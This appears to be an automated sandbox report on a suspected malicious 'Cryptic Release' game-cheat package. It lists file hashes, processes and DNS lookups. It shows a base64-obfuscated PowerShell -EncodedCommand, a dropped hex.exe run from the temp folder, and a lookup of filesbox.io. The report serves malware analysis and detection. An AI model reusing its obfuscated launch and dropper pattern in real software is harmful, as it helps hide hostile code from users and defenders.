| MD5 | 2bc84911a0747a4b55aebc1b32467891 |
| SHA1 | 2ecaa2b1c89fd4277bc92e8747b3ea514bd5740e |
| SHA256 | 778af3534ea300de49fad26172e3fbf0d68e77df8e68806881b3512ff09c4e15 |
| SHA512 | 9ce24ffb7e49354fdc4a3fb1cd159d47de2bb7bf2b080c9457b0f6f7dfe6a10c7f5579cfb39071f901ed6310842d42bdd19cbc3391ddf0bbe1378da4ca427b86 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | db660455679b2fb3d7445d390f48d219 |
| SHA1 | 6d38173aa52e8bb7307f00c8f3e8ae9fef0b08d1 |
| SHA256 | 238e3cddb71cc890b0857d7eefe366e787ae92d0a6ab61109069f7a84e43235a |
| SHA512 | 77a95b90f4a38548350bdf1a9bdc63770b7b18b9d6c1d0fb3618c822600139a5544e6a7820c4648d1fa8d950dc36a9f2c376dfdd555a80d66f08ff1b62f20d4f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 826c53523ee6be7c29ad6a65df7c9e30 |
| SHA1 | abc1e7a1d417015e80694a84bc998f544eb9f271 |
| SHA256 | 7c34e0a66c412fc5f659743bfb1c90ffa5066d25dc7946983c367f1080ae1244 |
| SHA512 | 99a216e90a71be29246ed85a0d158b59fb314d7ed37ae62fa0883dcef37845b691cfe5fb6fb86fc679a22bd4c8a04112ac5f98e7e6ae74dea0b802179f419768 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | fcb27415bb75a330a7d4ad2adffb5ebb |
| SHA1 | 4cc73a46d3023cb5632a824b6327b65090523e18 |
| SHA256 | 4cb030bfaa276d0184e9dc5e0396c665c82c8716ef0c3ff3c021d4f1f5b3b85b |
| SHA512 | d8c37912b0359175fecb566b86b286ea9d4bdb62c3ab100179bef2ed754fd06863a6c70cfc56e4406bd91a7f94d6460158b0e0cd60c4e5221b1d248fb444d83f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 4c9e0ac7479cd6b480381f492a605d74 |
| SHA1 | 6315a4135516732461b8c79a32ff627890727076 |
| SHA256 | 3e4c7dbd92cce68d85ab1fb7f59bdc6c88f5371f747fd74622a3d42f9a321782 |
| SHA512 | 12a922ffdca9c3b8548854bdb29a7e8224fe700f665eb1ddb8103ff9fcbb8ba0bd7a2077cd727892cb5e906ec6b71ee4393919319f7ca827cf5af562b554219c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 3fa89d1e6626fffec93eb8ce5cde50a7 |
| SHA1 | dc045b4c280c9345d761c6b8957db71d26483fc5 |
| SHA256 | 9f5b8dc22d8c4388144c2b0309d9c53d1a95da1c71b0015721a313d2c4d43d3b |
| SHA512 | 6233b9dedf2bff527987fb214c45008cca36b9de538f085322de038547a9bc904579112104a8b012d6a2feecd9ad99b1fef57632936a6c3af4ad3f02a78e5272 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | ceb2c7f5df91d9d43f03673a1c1fc3dc |
| SHA1 | d9dcd31d8d23609f64899e835fba3e503a2aae97 |
| SHA256 | 64ce12f1637bdd2337236faa6635106bca02d2193a57601a84cc111d4d148a1a |
| SHA512 | 4cb00f86208142e1e754039437640c24a9bf248d3aa042eda8fb5e60f2d9e0d18e39c7180b74d1ec78b14a87c1c36acb69f0502a6c996ca08f9a78eb618b47ed |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | ca76462288d5b9de9c738615df55bd7e |
| SHA1 | d715cec8921821f20974e9f36bd7458fdaafacf1 |
| SHA256 | 0510ca224dcd703cb28b51d1c9ad268fb52976c4fb58329f5e807442d308e2db |
| SHA512 | dbbd50783596d9d51b03e4e53aa68d890fd0322e6536ea89a2868296a80bca1831319ff07f159e9bfdbc477e3e0054ceff410965feebbf95ef90de7b79141049 |
C:\Program Files (x86)\Microsoft\EdgeUpdate\Download\{F3C4FE00-EFD5-403B-9569-398A20F1BA4A}\1.3.187.41\MicrosoftEdgeUpdateSetup_X86_1.3.187.41.exe
| MD5 | a9ad77a4111f44c157a1a37bb29fd2b9 |
| SHA1 | f1348bcbc950532ac2b48b18acd91533f3ac0be2 |
| SHA256 | 200a59abdeb32cc4d2cec4079be205f18b5f45bae42acb7940151f9780569889 |
| SHA512 | 68f58a15ef5ba5d49d8476bee4a488e9a721f703a645ddd29148915d555ca2eb451635c3b762e5a0f786d69bb5cba9bffac3eeee196f1ec7ad669e2d729fe898 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 6bfcdd3694316d41cb2beebda2bf5889 |
| SHA1 | cffddf976f86e42a38b56656538699abd0d76f29 |
| SHA256 | 81ba30cf6a887deba1dc2176b4486f7093d3b868172157cd123323f2210ad7bc |
| SHA512 | 649c498a12cecedbc9ce2311d258f4addb32b7b4010f833fb531ef63c5f920e64f4d62fa3df9f1f30e9d6362eaf13341c4ba96ec8db36f5980cf4a01264eb518 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | e31b844170228853a3dfc2ce97737a30 |
| SHA1 | a47b1eddf35f7a8b2aa43fd221599948727e98a7 |
| SHA256 | e20e9ba4f43d33c3ab5c6122b3b9f3b6c46bf48a6cc0d8981b0f9a40c0a6cb04 |
| SHA512 | 4ad41359c4449a33347a32a078797f4a5b6ddd8352e94df614ab1b98a256e16a82dc2309ce2e561b34c667d187b20fb29f6f2c292a3b73204a97073b815a1e62 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 5789181e1a5278e2e1647d7dcc1aefa6 |
| SHA1 | 79191c5cc471e1039030707e3392f6c09f9f3597 |
| SHA256 | 23ef87c2d2eb4d3d199d4b94e34fc7872a03cc19fb2f0f82b0cce723f6fe8f26 |
| SHA512 | 3fbda8d7419db9a1b6a34b88aa7fae83deb8eeba9e76866d1b44255861a9c4dab097ceb61fe8a90ccb32140ff41567ee602ca8ff6dca87369dfc5121251a11d6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 97198ca278f9c595be7efeb3e9c3d453 |
| SHA1 | b9487db84ed2a89ecff51b0e5e37fc5bf0e463d2 |
| SHA256 | 385cd08b74fb01ca7c37a831b67955f7dc87d0da44accf135113b07269325502 |
| SHA512 | faae43553f93b915f007581fc2f1d8c6367cd3026ad2b7f2e1a74a10afb3b742ccebb24a979d63e17ffcf5ab7439bacabd1cf386513451e8712b8f8c10615077 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 7327ff963f1e1ff010876c32db915173 |
| SHA1 | 7f7c5ca3e275cb7ecb0118b2126decd774a4313e |
| SHA256 | beede182fbe46c4a30b0c7f53721180361f618eecb77d1940c92c387f6023d8d |
| SHA512 | f3c4ddea729ffb1117f4d5f1edf3dc528bf10dce7244dbf7a61888d9ce1fb404b566ee0205f23f1c3582f34ef91a98b932b1a65dbff183a6718d9184d7b5a7aa |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | aa7481809bdd13249e995af0850b07ea |
| SHA1 | ca3e97e98401654fbc7199bdc73f7c9c0e9e3723 |
| SHA256 | 26e4b2d1d8a9cfbf4fb865f6dce6b968774683d62142196bcb95cfac55d5b2b2 |
| SHA512 | 5245a27a6ab1b66da7c635cf5ec509bc7287b6f0693aef0c9031b5796726bf2a7ee6db36ffcdc8e6baea272a2c3376303e0d203a15d51b3c5fb53fc1f20b3558 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 3a6bec4e74e1f77e6badc11bdd5bdcc0 |
| SHA1 | 3974ac2b6d7b957d041e6bfdfbeb7d827536a629 |
| SHA256 | 08563252a428fc256968e5482e0b1b3a43ecacb16eeb753334b1200c67b76795 |
| SHA512 | c5c8d319b2da58aa614ae2438ebe483c987ccef49f736f6094117ef3847ee3c6e2c967e4d825e57c4df1fec0b87488c5f71f4a8511a81afc3b975580dff6f89f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 1d32b276c0dae2b2160f7312cb8c1704 |
| SHA1 | 6a6d9c174548d40e3bf6f0196f9e9503b899eb18 |
| SHA256 | 891342746fff904ef7f733368cb7de99aa8ad04cc0f974d9667fe3cb69864626 |
| SHA512 | 625d93959ec41819f20fb95b320999426b3df9c983616ecff71944a8f71b0c381613179c1c11c4a701dfa40c30083d2d313ab81b66098df7836183bf20e7d0bf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | aa047624b24fc253d6a03dcfc8582704 |
| SHA1 | 6fa5882ea64429a8b76ae4a9fe11297dd2e6ffc8 |
| SHA256 | fa3c3293b6c2061855e5fe8ed602115fece30057b840aab5fb64ab37801b0691 |
| SHA512 | e452a33b91dd7c9a483c429f1ec341d81390420d44a945e7c719e3901c8bfc58963e5764c27d6c4d7b255d41fec920019cdcc392c3f4c361444a80f0c441e8bb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\0d9759d5-50e0-4727-a9db-ff1a6f895402.tmp
| MD5 | 39eb9bbf2263418cfb36eea0e3535416 |
| SHA1 | 6d06d1ae09e6236ba295611d1333cae1d41f1e3a |
| SHA256 | c3729dcd91750765d7f2d8246b6cd0a64c7fe715567a77dfa810ec8b4e8f808d |
| SHA512 | 041df576a55548b035f2126cbc26670f5cd1d3c87bf5f3789c8e6ab1db7297a2862452a40690d72ffdc7ae2bad28df2e4e4d67ec2a97716f93e82be89a3e2280 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f21c2b088ce7a676d5dfa4c11844f772 |
| SHA1 | b050adbdf44fe4ad4f54537ccad5a232ab881547 |
| SHA256 | 6fed5eaf732b8f010497658e85f1cfb8288057bea57b089a9f55e90858126a4a |
| SHA512 | b71c6df1eeb7fc3dc3572318cec5391e9691a245120b5f9c6da59bc77b8a0b28293fd1e3d625325214abd63a4958ea52bccb5834462b0829229336b4d96fd773 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 4ceaca724489de92387802a8ad5e1917 |
| SHA1 | a3b8bff5a9929aef6e956e3493025e0288ff3a44 |
| SHA256 | 53b9c300969cfbc2ec7500dceb55484c3fe5e40c8561b709b9a5b4f01d4d7f2e |
| SHA512 | 284019044ffd37659cdf0872c1d31779d3633b402f95c62d551cfc9dfd6e321c40000f172488d21ecb466f9972297cb426f75812761c8708853f371f035d5a51 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 9c5f0779ca27a2defa9dee23ba6d5836 |
| SHA1 | d7126dbe43d3a3bf539ef8ea875bd8e0028855fd |
| SHA256 | 6e2580ea2f92f6ebcea0e80632ab48a93f7af56a743bbe73ec28fcecd967993b |
| SHA512 | 3c06135374a7732aa7c6bad35e70ee10c2a84a0e3b3ffa34bf4c496b011339177ad19ef2299ae468d5bd76b0e5c1495121ef332ef6490d113a70f3f7645e5385 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 52920bd58beb2ab227e3a957c5baee36 |
| SHA1 | b348e8d982e5ad55c3629c89077ef79ff72181ad |
| SHA256 | 8022874b0497edc62c6f60e3f18ab3b29865cb103ac733de5f5f4cd9b25314ea |
| SHA512 | 9a4c694ddeb0669bd5177beb4c7008da5bb1c1550c68137b8c94207af38f2a5b6d6988a80bfabe59bd2e9c7d05217c8c38e6575d8540508d1abceec411a33a14 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 8e078eee2630f3f55d73ead62ddcecdc |
| SHA1 | 7c76ccc9ed41ad6526063dace66a1032fc6fbe13 |
| SHA256 | c82b6b086574158a757717c9ab5cf5c2baee9bf32d33d221ef3151246620f476 |
| SHA512 | f76f59a12c27208328e0676e38e5894022cdf644fcbc631a2446f04ad6021b7151d1e1859d19f8ad819a60fef47a8ba5812e22f12df6de1825da9ea26af06de8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | ad43b126133dc3d6f1a88efba93ac462 |
| SHA1 | 1e38e437bf375d3d944b52597569f219623eae3f |
| SHA256 | 179be80ef896b79139aa8cc22831fd0089efa0b94345e0618ba8eb04e71d2dfa |
| SHA512 | 3ae36c1f1c84f65d1cbc406951fb0d2b646807b3c80e3a4530e4780081a297920ab72421caafd71e01b763c74ee0587ae3beabb45f4f062d4793caaa88729239 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 0ba99d7c152f083fc95ba8d7d6533b4f |
| SHA1 | 3ddf2f116d06256c92f17f5c9786556b72a3b2aa |
| SHA256 | e2e798885b3700232fc57b3bfcc1877d0529aed78c238c79aab35435f3951239 |
| SHA512 | caa2f821bcf0a111bb5e66c3f3180dbff70d25c2ad6ba256e4bc7c9ed96b9c62de91875e79131bab6e1828dc1e9644676f663e6188a7b8a7bd9021498b481b1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | da08ed5c49c5eb49e6780c2f549921cf |
| SHA1 | 1d899e12d293f24718c923d438803f92b4086f69 |
| SHA256 | 0623390662eb3a708572c8f45a989660c75a5127e6ea69b69f30d0078139824e |
| SHA512 | b819223fb75265a9d62d368caa32963aa8251a4e53227fafc5bb8819ebe974bb8b9c2a6801eeaba079f886a85ad78be57df3af2dbf47e4960727cb2bfc09f10b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | a254c33f56e5fc1228e30d1e08631a36 |
| SHA1 | 81db06b50fead0e26a7ab86fcbb7490218a829de |
| SHA256 | ffbbb686b090c48412b9c30aa5da1d44c06570eecb80850dd4636b37c09b85ca |
| SHA512 | 396a315529ef98c37cb027e0cea4fb9df7a3da9bb29140a75aa72f20b7e3ec14ca278bbb6ed6c557bc039e075fa34784c8fbd3a7e5a15ad634afeca204a6c913 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\5e9e0489-c8d6-44c8-ae40-2828f79dad60.tmp
| MD5 | fa4c310300563abc4358351e0765c586 |
| SHA1 | 88da75f470bdad993bc55befd5b65f6884a9386e |
| SHA256 | 84b7cfa1f23c3e5dd615d2fd238927b529e92a1dc71c03d039eeb1e1cd634ea2 |
| SHA512 | 0f92609cadbbbfbb14a57af570fea05a82f039fda859d30a67b44b3bad2784d9696d80af05c4cefb9cb8d7229b5d49a5aa3949f959894ecf49d906e50e5da308 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\99566d9b-37ca-4b57-a8b2-77ae69b47e12.tmp
| MD5 | 8d5c8688652a51652aa28e1304bc9bba |
| SHA1 | 4a6c84bba2ffbf51415d7c1d5c7e4b6f72719321 |
| SHA256 | ffc8498f47328863f16338902c7b7c5fdc899b0078a9ba4de2fe21955adccb41 |
| SHA512 | 4732e43e780d5fafed00497e42c14a0a7ec307f2c9dec08f48af5842741e75144fb1f421fedcbcfdb39982b1254ff8cd4d45e09e479aed7e32d8411ea1b04189 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | e8efb1f69195124c31e9ffa5438c6521 |
| SHA1 | e074abd07cb58a487d49e1b800bd3a6d13c7e075 |
| SHA256 | f75dc4ce7e6b800cf41cb3249e592c8f6dee90f91e3d4abf864d9a2e2b142c5e |
| SHA512 | e29c58109d1396f6aa102940d3a4d23129f4aad9c69b981a742af5816504979ff45750a1c80ee66535d226b93cc0a8623617a6cc5a99526798e496ec5ceddbb5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 814168fcb2b8b19d793c17cc2b87f209 |
| SHA1 | 03b98c505eaf93a42118ac62713f9c69fac86e7b |
| SHA256 | 12e60d411562b0a01909b627317528188a94c5b63ea226f9dd9cfd44bdcc2c38 |
| SHA512 | d42fc1a3f3862161d47aa3d710550a0f6f71ec862a2939943aa1258d28bbcdbff57bd9ee4d50c66a089d923537fb81ff9728193750dcec5fe564e6464abdb68e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 5aace38887871f155ff77c64f84c0d16 |
| SHA1 | 8b38e59a88066104ea6c8305e407ab8eb03b25d9 |
| SHA256 | e2ccf240535120787374411fa6d5c42c502d8483e7c1f35e81f464178e8b51a4 |
| SHA512 | 0aca09727b6b0c236690e89f8a2bf37bf74179297e9235de7be29fa6664440f9bd0d932c38cc195e0998f8951e9a5c67e9685a78282e13ab5d9c9d0f7032f64e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 4ae3444c4012ef8776e272970613486e |
| SHA1 | e9c8ef5e3f86b428db1907be60c2b5e142464696 |
| SHA256 | 1983e4fe6150487ca7c05a012f13a72c35c5215092fbbd42c6bd1acc3b8bb971 |
| SHA512 | f53b801fb8c2d6f4db552c85adbc6aa899c499e23ec7d5298ec99b16ee36abe09655e151a2398e9a6eb4b9d8ae294df7971c9983ff915801fc18bd2f69eeb37b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | bca80181108fc56b01e8b27fcff6ecd8 |
| SHA1 | 7219a2703b734721b856392a9311186977c35151 |
| SHA256 | e89569bc89cfe34ec128a9ab1ac0d4c68a264fe8e7b8ede5566db7d997990cc6 |
| SHA512 | 510512c6b6f733e28220035b555c924b1fe24f671f51f0a7dff9a54a4846b9ed2dc833fecd8fcb330a51e4ca641c36f561721a9628f06082ae97553b3fd95fa3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 69f970e49126a8e7f0eac778752dbe9e |
| SHA1 | 11b5ef2fdb23bad2264ebdc4a0f32717a3d971f3 |
| SHA256 | f1be0c1bd5c62a77c8b432c3046a5ab0b4034ae1f7657828e9ff804f4f9aa201 |
| SHA512 | 4d42a7a5e85b2bc208e1bd6e4fe4d5706e0d2a44f24a0885ccba50f046e44cd784fd2a5b7a9daf4a5d08f091e788b96c963ecd5ca76cf2bec700d29c1bf9a082 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-20 18:17
Reported
2024-06-20 18:48
Platform
win10v2004-20240611-en
Max time kernel
450s
Max time network
1174s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Cryptic Release V1.4.4\ByfronHook.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.16.208.104.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-20 18:17
Reported
2024-06-20 18:48
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1799s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Cryptic Release V1.4.4\assets.dll",#1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3744,i,3724086843943218842,1026644135694712596,262144 --variations-seed-version --mojo-platform-channel-handle=1020 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3924,i,3724086843943218842,1026644135694712596,262144 --variations-seed-version --mojo-platform-channel-handle=4040 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.162.46.104.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-20 18:17
Reported
2024-06-20 18:48
Platform
win10v2004-20240508-en
Max time kernel
1659s
Max time network
1675s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Cryptic Release V1.4.4\bin\autoattach.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 52.111.229.43:443 | tcp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-20 18:17
Reported
2024-06-20 18:48
Platform
win10v2004-20240611-en
Max time kernel
455s
Max time network
1183s
Command Line
Signatures
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Cryptic Release V1.4.4\instructions.txt"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.193.132.51.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-20 18:17
Reported
2024-06-20 18:48
Platform
win10v2004-20240611-en
Max time kernel
452s
Max time network
1182s
Command Line
Signatures
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Cryptic Release V1.4.4\license.txt"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.16.208.104.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-20 18:17
Reported
2024-06-20 18:48
Platform
win10v2004-20240508-en
Max time kernel
1628s
Max time network
1638s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Cryptic Release V1.4.4\Cryptic Release V1.4.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_4336_133633811109962119\hex.exe | N/A |
Loads dropped DLL
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Cryptic Release V1.4.4\Cryptic Release V1.4.exe
"C:\Users\Admin\AppData\Local\Temp\Cryptic Release V1.4.4\Cryptic Release V1.4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAaAB4ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAZwBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBHAEcALwBDAFIAWQBQAFQASQBDAFMAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBwAGcAeQAjAD4A"
C:\Users\Admin\AppData\Local\Temp\hex.exe
"C:\Users\Admin\AppData\Local\Temp\hex.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133633811109962119\hex.exe
"C:\Users\Admin\AppData\Local\Temp\hex.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | filesbox.io | udp |
Files
C:\Users\Admin\AppData\Local\Temp\hex.exe
| MD5 | 9b21bdd0a71fa719388923513b4b5527 |
| SHA1 | 62111bac05573f689c5098b4a902c5a68dfd8fd7 |
| SHA256 | 33b1633d1caa4f584a23604d0313c1832d67c29fb46a735b60a353afae898e3d |
